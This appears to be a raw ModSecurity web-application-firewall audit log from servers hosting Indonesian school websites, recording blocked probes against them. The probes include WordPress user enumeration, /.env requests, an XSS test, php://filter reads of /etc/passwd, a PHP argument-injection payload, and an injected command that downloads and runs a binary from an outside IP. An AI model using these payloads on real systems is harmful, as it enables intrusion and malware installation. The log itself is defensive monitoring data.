charset=iso-8859-1 --9d2ea067-E-- --9d2ea067-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748676331501329 4569 (- - -) Stopwatch2: 1748676331501329 4569; combined=2769, p1=515, p2=2208, p3=0, p4=0, p5=46, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d2ea067-Z-- --5e5b3b1b-A-- [31/May/2025:14:58:12 +0700] aDq2lOg1nD2n5twq7NtMwgAAAEU 103.236.140.4 59172 103.236.140.4 8181 --5e5b3b1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.160.106.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.160.106.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e5b3b1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e5b3b1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748678292093665 2736 (- - -) Stopwatch2: 1748678292093665 2736; combined=1263, p1=405, p2=829, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e5b3b1b-Z-- --d9a5f038-A-- [31/May/2025:15:12:45 +0700] aDq5_eg1nD2n5twq7NtSMAAAAEc 103.236.140.4 47012 103.236.140.4 8181 --d9a5f038-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.171.53.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.171.53.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9a5f038-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9a5f038-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748679165798119 3053 (- - -) Stopwatch2: 1748679165798119 3053; combined=1335, p1=445, p2=848, p3=0, p4=0, p5=42, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9a5f038-Z-- --c7c5f405-A-- [31/May/2025:15:13:06 +0700] aDq6Ep3Kgs4r2wz12c6knQAAAAE 103.236.140.4 47424 103.236.140.4 8181 --c7c5f405-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.16.33.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.16.33.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c7c5f405-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7c5f405-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748679186306665 2433 (- - -) Stopwatch2: 1748679186306665 2433; combined=1108, p1=342, p2=745, p3=0, p4=0, p5=21, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c5f405-Z-- --6559d947-A-- [31/May/2025:15:26:38 +0700] aDq9Ph_L2Rte6DjSjWZFoQAAAIY 103.236.140.4 35516 103.236.140.4 8181 --6559d947-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.171.7 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.171.7 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --6559d947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6559d947-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748679998638287 734 (- - -) Stopwatch2: 1748679998638287 734; combined=303, p1=268, p2=0, p3=0, p4=0, p5=35, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6559d947-Z-- --bad97847-A-- [31/May/2025:15:35:29 +0700] aDq_UR_L2Rte6DjSjWZHBgAAAJI 103.236.140.4 46494 103.236.140.4 8181 --bad97847-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=1 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --bad97847-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bad97847-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748680529024310 1004 (- - -) Stopwatch2: 1748680529024310 1004; combined=474, p1=434, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bad97847-Z-- --837c465e-A-- [31/May/2025:15:54:45 +0700] aDrD1eg1nD2n5twq7NteAAAAAFg 103.236.140.4 38348 103.236.140.4 8181 --837c465e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.200.53.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.200.53.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --837c465e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --837c465e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748681685993542 3043 (- - -) Stopwatch2: 1748681685993542 3043; combined=1378, p1=460, p2=880, p3=0, p4=0, p5=38, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --837c465e-Z-- --5b5c983c-A-- [31/May/2025:16:07:04 +0700] aDrGuJ3Kgs4r2wz12c604QAAABA 103.236.140.4 51194 103.236.140.4 8181 --5b5c983c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 81.216.9.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 81.216.9.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5b5c983c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b5c983c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748682424741596 3248 (- - -) Stopwatch2: 1748682424741596 3248; combined=1442, p1=477, p2=928, p3=0, p4=0, p5=36, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b5c983c-Z-- --cc59fd43-A-- [31/May/2025:16:08:08 +0700] aDrG-B_L2Rte6DjSjWZPngAAAII 103.236.140.4 52456 103.236.140.4 8181 --cc59fd43-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.157.114.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.157.114.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cc59fd43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc59fd43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748682488468128 2246 (- - -) Stopwatch2: 1748682488468128 2246; combined=1306, p1=412, p2=867, p3=0, p4=0, p5=27, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc59fd43-Z-- --7dc0dd44-A-- [31/May/2025:16:38:20 +0700] aDrODJ3Kgs4r2wz12c7G_wAAAAQ 103.236.140.4 35968 103.236.140.4 8181 --7dc0dd44-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.87.128.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.87.128.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7dc0dd44-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dc0dd44-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748684300868961 2287 (- - -) Stopwatch2: 1748684300868961 2287; combined=1247, p1=409, p2=804, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dc0dd44-Z-- --1c89572e-A-- [31/May/2025:16:50:20 +0700] aDrQ3FbZTRMbIzLSWp7JBQAAAMY 103.236.140.4 34362 103.236.140.4 8181 --1c89572e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.58.93.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.58.93.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1c89572e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c89572e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748685020099643 2941 (- - -) Stopwatch2: 1748685020099643 2941; combined=1367, p1=442, p2=895, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c89572e-Z-- --6d888d56-A-- [31/May/2025:17:41:42 +0700] aDrc5ug1nD2n5twq7NuKowAAAFI 103.236.140.4 50472 103.236.140.4 8181 --6d888d56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --6d888d56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d888d56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748688102660399 823 (- - -) Stopwatch2: 1748688102660399 823; combined=346, p1=301, p2=0, p3=0, p4=0, p5=45, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d888d56-Z-- --c5bda327-A-- [31/May/2025:17:49:51 +0700] aDrez-g1nD2n5twq7NuM9wAAAEw 103.236.140.4 59504 103.236.140.4 8181 --c5bda327-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.93.95.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.93.95.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c5bda327-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5bda327-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748688591901162 3438 (- - -) Stopwatch2: 1748688591901162 3438; combined=1831, p1=534, p2=1265, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5bda327-Z-- --74c69518-A-- [31/May/2025:18:02:36 +0700] aDrhzJ3Kgs4r2wz12c7o5gAAAAg 103.236.140.4 46620 103.236.140.4 8181 --74c69518-B-- GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 --74c69518-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74c69518-E-- --74c69518-H-- Message: Access denied with code 403 (phase 2). Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689356500766 4352 (- - -) Stopwatch2: 1748689356500766 4352; combined=2306, p1=782, p2=1484, p3=0, p4=0, p5=40, sr=95, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74c69518-Z-- --f2f6fd26-A-- [31/May/2025:18:02:37 +0700] aDrhzZ3Kgs4r2wz12c7o6AAAAAk 103.236.140.4 46650 103.236.140.4 8181 --f2f6fd26-B-- GET /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --f2f6fd26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2f6fd26-E-- --f2f6fd26-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357458058 2852 (- - -) Stopwatch2: 1748689357458058 2852; combined=963, p1=677, p2=247, p3=0, p4=0, p5=39, sr=121, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2f6fd26-Z-- --c5f18c08-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8WgAAAI8 103.236.140.4 46656 103.236.140.4 8181 --c5f18c08-B-- GET /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --c5f18c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5f18c08-E-- --c5f18c08-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357458564 2514 (- - -) Stopwatch2: 1748689357458564 2514; combined=801, p1=573, p2=188, p3=0, p4=0, p5=40, sr=100, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5f18c08-Z-- --7a23f410-A-- [31/May/2025:18:02:37 +0700] aDrhzVbZTRMbIzLSWp7hGgAAANM 103.236.140.4 46652 103.236.140.4 8181 --7a23f410-B-- GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --7a23f410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a23f410-E-- --7a23f410-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748689357458284 2949 (- - -) Stopwatch2: 1748689357458284 2949; combined=954, p1=529, p2=382, p3=0, p4=0, p5=43, sr=89, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a23f410-Z-- --daddb327-A-- [31/May/2025:18:02:37 +0700] aDrhzR_L2Rte6DjSjWZ8WQAAAJU 103.236.140.4 46654 103.236.140.4 8181 --daddb327-B-- GET /dompdf.php?input_file=php://filter/resource=/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 